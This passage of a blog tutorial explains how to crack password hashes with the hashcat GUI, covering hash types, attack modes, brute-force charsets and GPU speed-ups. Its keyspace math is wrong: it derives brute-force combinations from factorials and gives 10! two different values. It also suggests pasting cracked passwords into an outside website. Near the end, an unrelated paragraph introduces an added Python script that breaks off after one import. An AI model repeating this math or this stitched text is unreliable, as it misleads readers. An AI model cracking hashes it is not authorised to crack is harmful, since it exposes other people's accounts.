&amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Domain Cached Credentials (DCC)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;MSSQL&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;SHA256&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;SHA-512&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 
level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Oracle 11G&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;DES(Unix)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;A few other highlights worth mentioning are that it does not require any installation (can run from USB) and it is FREE and also works on both 32 and 64 bit operating systems. The tool set is also capable of working under Linux and the console versions come pre-loaded with Backtrack 4 and 5 but I am excited and focused on the latest GUI release so I won’t be covering those as I am tired of typing out the commands (hence my excitement). The latest GUI wraps all of the previous console releases under one roof (hashcat, oclHashcat, oclHashcat-plus, and oclHashcat-lite). Now for some overview and review...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;You will need to download the software from the link I gave you above and unzip the folder to wherever you would like to run it from. If you are using the GUI version then it doesn’t matter, if you are using the console version you need to navigate to that folder for it to work unless you modify your environment paths. You can just double click on the hashcat-gui64.exe or hashcat-gui32.exe, depending on your setup and it will launch the GUI. You should see this first (choose the one that fits your system); &lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://img846.imageshack.us/img846/6462/28733229.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="120" src="http://img846.imageshack.us/img846/6462/28733229.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Choose CUDA for NVidia cards and OpenCL for ATI cards or CPU if you don’t have any GPU to use. NOTE: If you select one of the GPU options it will load the CPU requirements as well so you only need to choose one option. Then it will load the GUI with all of the needed tools, and will then look like this:&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img853.imageshack.us/img853/8694/82057246.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img853.imageshack.us/img853/8694/82057246.png" t8="true" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;&lt;span style="font-family: Calibri;"&gt;Hashcat (Tab1):&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Let’s begin with an overview of Hashcat first and then I will take you through the other tabs. Hashcat is the part of the tool that leverages the CPU power to crack hashes, while the rest of the tools/tabs we will cover rely on the GPU(s). You will need to place your hashes in a file so you can load it in the tool, just click on open and browse to find and load. Next you can choose to check to remove the cracked hashes or not. I like to move copies into the local Hashcat folder to work on so I have backups elsewhere and find it nice to size it down as I go through all of my variations to get an idea of what is working and what isn’t (helps if you are working on large lists). You can also change the HASH:PASS separator if you do not like the default ":", but this is not typically needed. Also I have a nice trick I will share later that works if you keep the default. Next comes the wordlists, you can add as many as you have and then arrange the order of them as well. Simply click on the "Add files" button and browse to where you keep your Dictionary files. I have used shmoosh2x64.exe to combine all of my wordlists into a single file, I suggest you find a tool that works for you to keep the number to a reasonable level or by category so you can load in the ones you want or arrange as needed after loading them all in. Next you will need to identify the mode and the hash type to use. 
You can change the mode to alter your word list based on the description, by bruteforce mode, or you can go a step further and use rules to alter your word lists performing a hybrid attack.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;I will assume you can figure out the Hash Type drop down menu but some may have trouble with the modes so here is a quick overview of the different attack modes:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;u&gt;straight&lt;/u&gt; - This mode will go through your dictionary from top to bottom without altering anything, if it is on your list it will find it if not it won’t...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;u&gt;combination&lt;/u&gt; - This mode will combine words together in the form of word1word1, word1word2 using the defined dictionary to pair the word combinations.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span 
style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;u&gt;Toggle-Case&lt;/u&gt; - This mode goes through your wordlist and toggles the case of characters in each word, for example: word, Word, wOrd, woRd, worD, and so on...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;u&gt;Permutation&lt;/u&gt; - This mode extends your wordlist by trying every reordering of the characters in each word (all permutations of its letters). The same effect can be obtained with a good rule set, so I won't cover it further...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;u&gt;Table-Lookup&lt;/u&gt; - Despite the name, this is not a rainbow-table attack and needs no precomputed hash tables. It takes a table file that maps each character to a set of substitutes (for example a to a, 4 and @) and, for each dictionary word, generates every combination of those substitutions, in effect building the replacement rules for you. I tend not to use it, so I will not go into it here...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 10pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;u&gt;Bruteforce&lt;/u&gt; - This tries every possible combination of the chosen charset between the minimum and maximum length. The time needed to exhaust the keyspace depends on the charset size, the length range and the power of the machine you run it on.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;I advise reviewing the Hashcat site for rules files as they can be used to manipulate your wordlist and make them exponentially more valuable and effective. They also can allow you to manipulate a wordlist as defined by the rule set used. You can use this to get the same affects as the Toggle-Case, Permutations, Combination, as well as custom ones like adding 2011 to the end or beginning of each word, or maybe in the middle instead. These types of things can all be defined in the rules and then loaded in to modify your wordlist on the fly. I generally run the "Straight" words attack mode and then roll through all of my rules I have setup one by one with a much higher rate of effectiveness. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Here are some possible charsets you might want to try out if you will be Bruteforcing your way to victory. 
Just keep in mind how they can impact time it might take to crack cycling through all possible combinations and also why it important to keep a secure password:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;0123456789 &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;3628800 Possible Combinations&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;abcdefghijklmnopqrstuvwxyz&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span 
style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;ABCDEFGHIJKLMNOPQRSTUVWXYZ&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;403291461126605635584000000 Possible Combinations&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;!"#$%&amp;amp;'()*+,-./:;&amp;lt;=&amp;gt;?@[\]^_`{|}~&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;abcdefghijklmnopqrstuvwxyz0123456789&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;3.7199332678990121746799944815084e+41 Possible Combinations&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&amp;amp;'()*+,-./:;&amp;lt;=&amp;gt;?@[\]^_`{|}~&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; 
mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;abcdefghijklmnopqrstuvwxyz0123456789!"#$%&amp;amp;'()*+,-./:;&amp;lt;=&amp;gt;?@[\]^_`{|}~&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;2.4800355424368305996009904185692e+96 Possible Combinations&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span 
style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&amp;amp;'()*+,-./:;&amp;lt;=&amp;gt;?@[\]^_`{|}~&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;1.0873661566567430802736528525679e+146 Possible Outcomes&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt; text-indent: 1.5in;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: Possible combinations can be derived using factorial functions: x! Where x = number of characters available to use, hence:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="margin: 0in 0in 10pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;0123456789 - 10! OR 10 x 9 x 8 x 7 x 6 x 5 x 4 x 3 x 2 x 1 = 362800 Possible Combinations&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;That is all the math I will bore you with for now, sorry but thought someone out there might find this interesting. Once you have identified the method that works best for you simply setup all the options and point everything to the correct files and if you have elected to have the cracked hashes removed then you might want to also check the Output "Write recovered hashes to file" and point it to where you want the output to go to. It will create a new file if needed, and will share nicely with the other tabs if you decide to use one file for all of your outputs, you can also play with the output formatting as well to put in form of HASH:PASS or HAHS:HEX_PASS or HAHS:PASS:HEX_PASS.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;TRICK: If you have want to take the found passwords form the output file and add them to the word list you can write your own batch script or Perl script to remove the hash from prefix using the "hash list separator" as your indicator mark to stop removing items from each line. If that doesn’t work you can copy and paste the list online here: &lt;a href="http://www.md5decrypter.co.uk/list-tool.aspx"&gt;http://www.md5decrypter.co.uk/list-tool.aspx&lt;/a&gt;. You can identify your hash list separator on the right hand side and then let it run. It will allow you to split the list into a separate hash file and a separate password file, which you can then add to your word list or manage as needed. See screenshot below:&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img219.imageshack.us/img219/6885/21394100.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="215" src="http://img219.imageshack.us/img219/6885/21394100.png" t8="true" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;/span&gt;&amp;nbsp;&lt;span style="font-family: Calibri;"&gt;Everything so far relates to the main tab for Hashcat which relies on CPU power. This can be fine if you have a simple rule set or a small word list, but can take centuries if you have a rather complex rule set and a really large word list. For example, I am running this with the latest i7 core processor and can get speeds up at about 56 Million words a second which may take around 13 Hours if I let it go non-stop at an 8 character password with the "abcdefghijklmnopqrstuvwxyz0123456789" charset. 
If I wanted to start testing longer password possibilities or larger charsets it would start growing exponentially and would become unrealistic after a while. This is where it is handy to upgrade your motherboard with a few video cards and start putting them to use in cracking. The GPU cores can be used to help out the job and can achieve insanely high pass through rates. If we run the same bruteforce attack using my two GPU enabled cards (450GTS &amp;amp; 580GTX-ti) I can speed things up to about 800 Million Passwords a second to speed the attack time from ~13 hours to just under an hour. This makes a HUGE difference in completion time!!! &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
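For the TRICK above, here is an added Python script (not code from this post or from hashcat) that does the split locally, so recovered passwords never leave your machine. It handles the three output formats mentioned earlier (HASH:PASS, HASH:HEX_PASS and HASH:PASS:HEX_PASS); the hex column is assumed to be a bare hex string of the plaintext bytes, and decoding it means a plaintext that itself contains the separator is still recovered correctly. With plain HASH:PASS the first separator is assumed to end the hash, which holds for unsalted hashes such as MD5. The sample lines are constructed inside the code from the MD5 of three throwaway plaintexts; function names are the example's own.

```python
"""Split a hashcat output file into a hash list and a wordlist (added example)."""
import hashlib


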